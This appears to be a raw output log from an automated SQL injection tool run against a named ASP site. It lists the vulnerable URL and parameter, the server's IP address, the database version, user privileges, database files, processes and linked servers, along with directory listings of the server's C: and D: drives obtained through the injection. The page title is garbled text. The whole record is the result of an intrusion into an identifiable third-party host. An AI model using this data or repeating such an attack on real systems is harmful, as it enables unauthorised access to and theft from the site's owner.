■漏洞信息:============================================================
 ・URL:http://jdractors.com/Community/BF_List.asp?BF_Cate=0&BF_SearchKind=&BF_SearchString=&gotoPage=713&BF_Kind=1
 ・页面标题：虐令葛胆 酒开胶鸥 - 楷啊浚磐抛牢刚飘
 ・参数:BF_Cate=0&BF_SearchKind=&BF_SearchString=&gotoPage=713&BF_Kind=1
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:221.143.48.226
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 03 Apr 2011 11:34:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 50655
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQQDRQRC=GLIPHFLDFAKECBDAJOLFBHAK; path=/
Cache-control: private



■数据库信息:============================================================
- 数据库名：YGENT
- 用户名：dbo
- 版本：Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
	May  3 2005 23:18:38 
	Copyright (c) 1988-2003 Microsoft Corporation
	Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

- 服务器名：SERVER
- 服务名：MSSQLSERVER
- 系统用户名：ygent

 ・当前用户权限：
sysadmin(sa): 0
dbcreator): 0
bulkadmin: 0
diskadmin: 0
serveradmin: 0
public: 1
db_owner: 1
db_backupoperator: 0
db_datawriter: 0

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
BGH	C:\Program Files\Microsoft SQL Server\MSSQL\data\BGH_Data.MDF	
KSIE	C:\Program Files\Microsoft SQL Server\MSSQL\Data\KSIE_Data.MDF	
master	C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf	
model	C:\Program Files\Microsoft SQL Server\MSSQL\data\model.mdf	
msdb	C:\Program Files\Microsoft SQL Server\MSSQL\data\msdbdata.mdf	
Muziq	C:\Program Files\Microsoft SQL Server\MSSQL\Data\Muziq.mdf	
Northwind	C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.mdf	
pubs	C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs.mdf	
tempdb	C:\Program Files\Microsoft SQL Server\MSSQL\data\tempdb.mdf	
YGENT	C:\Program Files\Microsoft SQL Server\MSSQL\Data\YGENT_Data.MDF	

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
dbo			08  6 2000  1:27AM	
guest	.	.	08  6 2000  1:27AM	

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5
Internet Information Services	sleeping	SERVER	3160	AWAITING COMMAND	IUSR_COM	
Internet Information Services	sleeping	SERVER	2676	AWAITING COMMAND	IUSR_COM	
Internet Information Services	sleeping	SERVER	2676	AWAITING COMMAND	IUSR_COM	
Internet Information Services	sleeping	SERVER	2676	AWAITING COMMAND	IUSR_COM	
Internet Information Services	sleeping	SERVER	2676	AWAITING COMMAND	IUSR_COM	

 ・链接的服务器信息:
服务器名	服务器产品	提供者名	数据源	位置	服务器网络名
----------------------------------------------------------------------------------------------------
SERVER	SQL Server	SQLOLEDB	SERVER		SERVER	

 ・数据库用户登录信息：
用户名	密码HASH	数据库编号	语言	时间1	时间2
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

Dir of D:: 

9bacd911ecaf6188ad470d5b\
BGH\
CONNECT\
FTP\
KSIE\
MUZIQ\
RECYCLER\
System Volume Information\
YGENT\

Dir of C:: 

AGSPay40\
Documents and Settings\
FPSE_search\
Inetpub\
Intel\
Program Files\
RECYCLER\
SQL2KSP4\
System Volume Information\
TempEI4\
WINDOWS\
wmpub\
AUTOEXEC.BAT
CONFIG.SYS
lan.log
realtek.log
RHDSetup.log

Dir of C:\wmpub: 

WMArchive\
wmiislog\
WMRoot\

Dir of C:\wmpub\WMRoot: 

encoder_ad.wmv
fupgrade.asf
industrial.wmv
legacy_content_clip.wmv
legacy_sample_playlist.wsx
pinball.wmv
powered_by_100.wmv
powered_by_300.wmv
proseware_leadin.jpg
racecar_100.wmv
racecar_300.wmv
serverside_playlist.wsx
snowboard_100.wmv
snowboard_300.wmv
wrapper_playlist.wsx

Dir of C:\wmpub\wmiislog: 


Dir of C:\wmpub\wmiislog: 


Dir of C:\wmpub\WMArchive: 


Dir of C:\WINDOWS: 
一次性获取失败，正在批次获取……
Dir of C:\TempEI4: 

3.tmp
4.tmp
EI42.LOG
EI42.tmp
EI44.LOG
EI45.LOG
EI45.tmp
EI452.LOG

Dir of C:\System Volume Information: 


Dir of C:\Intel: 

Logs\

Dir of C:\Intel\Logs: 

IntelChipset.log
IntelGFX.log

Dir of C:\Inetpub: 

AdminScripts\
catalog.wci\
ftproot\
mailroot\
wwwroot\

Dir of C:\Inetpub\wwwroot: 

_private\
_vti_cnf\
_vti_log\
_vti_pvt\
_vti_script\
_vti_txt\
aspnet_client\
images\
_vti_inf.html
iisstart.htm
pagerror.gif
postinfo.html

